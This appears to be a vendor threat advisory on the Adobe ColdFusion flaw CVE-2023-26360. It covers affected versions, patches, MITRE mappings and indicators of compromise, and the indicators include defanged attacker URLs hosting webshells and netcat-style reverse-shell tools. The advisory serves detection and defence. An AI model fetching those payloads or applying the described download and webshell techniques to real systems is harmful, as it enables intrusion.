Get in Touch
Adobe ColdFusion zero-day vulnerability exploited
Update – Adobe ColdFusion vulnerability exploited (21st March 2023 at 15:13 UTC)
Overview
Active exploitation of Adobe ColdFusion vulnerabilities has been detected by cyber security researchers at Rapid7. At the time of writing, the reported instances have not been attributed to the recently reported Adobe ColdFusion vulnerability, tracked as CVE-2023-26360. However, a potential association has not been explicitly ruled out as of yet.
The timeline of the reported exploitation dates back to January 2023. Investigations have indicated that a threat actor deployed webshells using an encoded PowerShell command, a technique applied when redirecting strings into files when creating webshells.
Moreover, the instance discovered the utilisation of the ‘certutil.exe’ binary with the ‘-urlcache’ flag being passed to it, a technique that is applied by threat actors to retrieve files hosted on a remote web server.
Updated Indicators of Compromise
Network indicators:
– www.av-iq[.]com – FQDN
– www.ooshirts[.]com – FQDN
– hXXps://www.av-iq[.]com/wow.txt – FQDN
– hXXps://www.ooshirts[.]com/images/zzz.txt – FQDN
– hXXps://www.ooshirts[.]com/images/dncat.exe – URL
– hXXp://www.ooshirts[.]com/images/nc.exe – URL
File hashes (SHA- 256):
– e77d6a10370db19b97cacaeb6662ba79f34087d6eaa46f997ea4956e2ad2f245
– 2482ab79ecb52e1c820ead170474914761358d3cee16e3377fd6e031d3e6cc25
– 03b06d600fae4f27f6a008a052ea6ee4274652ab0d0921f97cfa222870b1ddc3
– be56f5ed8e577e47fef4e0a287051718599ca040c98b6b107c403b3c9d3ee148
– ce80b839411b1541d09b0ede82f1477b516da0c60760079f46ba4443e1a6f419
– 213079ef54d225c4ca75dd0d57c931bdc613e8c89a2d0dbff88be5b446d231f0
File hashes (SHA-1):
– dac7867ee642a65262e153147552befb0b45b036
– 5d95fb365b9d0ceb568bb0c75cb1d70707723f27
File hashes (MD-5):
– 1edf1d653deb9001565b5eff3e50824a
– 470797a25a6b21d0a46f82968fd6a184
Files:
– WOW.TXT – ColdFusion WebShell
– wow.txt – ColdFusion WebShell
– www.txt – ColdFusion WebShell
– www.cfm – ColdFusion WebShell
– wow1.cfm – ColdFusion WebShell
– zzz.txt – ColdFusion WebShell
– dncat.exe – DotNetCat
– nc.exe – NetCat
Updated Mitre Methodologies
Tactic:
TA0042– Resource Development
Target Industry
Indiscriminate, opportunistic targeting.
Overview
Severity Level – Critical: Compromise may result in the loss of confidentiality and integrity of data.
A critical arbitrary code execution security flaw has been disclosed as affecting Adobe ColdFusion. The vulnerability, tracked as CVE-2023-26360 (CVSSv3 score: 8.6), is caused by an Improper Access Control weakness and has the potential to be exploited by remote unauthenticated threat actors in low-complexity attacks. Adobe reported that the vulnerability is currently being exploited in the wild “in very limited attacks”.
The vulnerability was added by the Cybersecurity and Infrastructure Security Agency (CISA) to its catalogue of security flaws exploited in the wild and they have given Federal Civilian Executive Branch (FCEB) agencies until 5th April 2023 to apply the relevant updates to safeguard their networks against potential threats.
Impact
Successful exploitation of CVE-2023-26360 could enable threat actors to gain arbitrary code execution and arbitrary file system read capabilities, in relation to the affected Adobe product versions.
Vulnerability Detection
Adobe has released patches pertaining to the security flaw for the respective product versions. As such, previous versions are vulnerable to the potential exploits.
Affected Products
– Adobe ColdFusion 2018: Update 15 and earlier
– Adobe ColdFusion 2021: Update 5 and earlier
It should be noted that CVE-2023-26360 also affects Adobe ColdFusion 2016 and ColdFusion 11 installations, neither of which are supported as they have reached end-of-life (EoL).
Containment, Mitigations & Remediations
It is strongly recommended that administrators apply the following Adobe updates:
– Adobe ColdFusion 2018: Update 16
– Adobe ColdFusion 2021: Update 6
Indicators of Compromise
No specific Indicators of Compromise (IoCs) are available at this time.
Threat Landscape
Adobe occupies a significant portion of the application-development market share. Threat actors generally utilise a combination of probability and asset value to determine which attack surfaces to focus on. As a result, application-development products can emerge as a prime target. Due to the fact that Adobe products have become an integral aspect of personal and business operations, threat actors will continue to exploit the associated vulnerabilities in an attempt to exfiltrate sensitive data contained therein or impact associated business operations.
Threat Group
No attribution to specific threat actors or groups has been identified at the time of writing.
Mitre Methodologies
Tactic:
– TA0004 – Privilege Escalation
Technique:
– T1055.001– Process Injection: Dynamic-link Library Injection
Common Weakness Enumeration:
– CWE-284 – Improper Access Control
Further Information
Adobe Advisory
AttackerKB Vulnerability Profile